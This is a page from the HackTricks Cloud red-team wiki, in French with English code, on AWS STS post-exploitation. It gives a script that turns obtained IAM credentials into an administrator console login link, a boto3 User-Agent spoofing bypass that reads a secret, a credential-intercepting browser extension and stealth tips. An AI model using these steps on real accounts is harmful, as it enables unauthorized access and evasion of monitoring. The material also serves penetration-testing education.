HackTricks CloudAWS - STS Post Exploitation
Tip
Apprenez et pratiquez le hacking AWS :
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP :HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Soutenir HackTricks
- Vérifiez les plans d’abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.
STS
Pour plus d’informations :
AWS - IAM, Identity Center & SSO Enum
From IAM Creds to Console
Si vous avez réussi à obtenir des IAM credentials, vous pourriez être intéressé par accessing the web console en utilisant les outils suivants.\ Notez que le user/role doit avoir la permission sts:GetFederationToken.
Script personnalisé
Le script suivant utilisera le profil par défaut et une default AWS location (not gov and not cn) pour vous fournir une signed URL que vous pouvez utiliser pour vous connecter dans le web console:
# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi
# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')
# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")
# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"
# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)
# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
aws_consoler
Vous pouvez générer un lien vers la console web avec https://github.com/NetSPI/aws_consoler.
cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console
Warning
Assurez-vous que l’utilisateur IAM dispose de l’autorisation
sts:GetFederationToken, ou fournissez un rôle à assumer.
aws-vault
aws-vault est un outil pour stocker et accéder en toute sécurité aux identifiants AWS dans un environnement de développement.
aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith
Note
Vous pouvez aussi utiliser aws-vault pour obtenir une session de console du navigateur
De la console web aux IAM Creds
L’extension de navigateur https://github.com/AI-redteam/clier est capable d’intercepter depuis le réseau les identifiants IAM avant qu’ils ne soient protégés dans la mémoire du navigateur.
Bypass User-Agent restrictions from Python
S’il existe une restriction pour effectuer certaines actions basée sur le User-Agent utilisé (comme restreindre l’utilisation de la librairie python boto3 en fonction du User-Agent), il est possible d’utiliser la technique précédente pour se connecter à la console web via un navigateur, ou vous pouvez directement modifier le User-Agent de boto3 en faisant :
# Shared by ex16x41
# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")
# Change user agent of the client
client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )
# Perform the action
response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])
sts:GetFederationToken
Avec cette permission, il est possible de créer une identité fédérée pour l’utilisateur qui l’exécute, limitée aux permissions dont cet utilisateur dispose.
aws sts get-federation-token --name <username>
Le jeton renvoyé par sts:GetFederationToken appartient à l’identité fédérée de l’utilisateur appelant, mais avec des autorisations restreintes. Même si l’utilisateur a des droits d’administrateur, certaines actions telles que lister les IAM users ou attacher des policies ne peuvent pas être effectuées via le jeton fédéré.
De plus, cette méthode est un peu plus stealthy, puisque l’utilisateur fédéré n’apparaît pas dans l’AWS Portal ; il ne peut être observé que via les logs CloudTrail ou des outils de monitoring.
Tip
Apprenez et pratiquez le hacking AWS :
Apprenez et pratiquez le hacking GCP :Soutenir HackTricks
- Vérifiez les plans d’abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.